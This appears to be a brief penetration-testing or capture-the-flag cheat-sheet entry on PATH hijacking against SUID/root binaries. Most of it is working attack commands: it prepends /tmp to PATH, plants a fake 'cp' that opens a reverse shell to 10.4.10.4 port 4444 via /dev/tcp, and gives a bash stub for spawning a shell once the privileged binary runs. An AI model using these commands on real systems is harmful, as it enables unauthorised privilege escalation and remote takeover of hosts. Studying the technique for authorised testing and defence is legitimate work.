PATH Hijacking

When a SUID/root binary calls a sub-binary by name (e.g. cp), prepend a writable directory to PATH.

Inspect and override PATH

echo $PATH
export PATH=/tmp:$PATH
echo $PATH

Plant a malicious binary

echo 'bash -c "exec bash -i &>/dev/tcp/10.4.10.4/4444 <&1"' > /tmp/cp
chmod +x /tmp/cp

Then trigger the privileged binary that calls cp.

Generic shell stub for path hijacking

#!/bin/bash
bash -i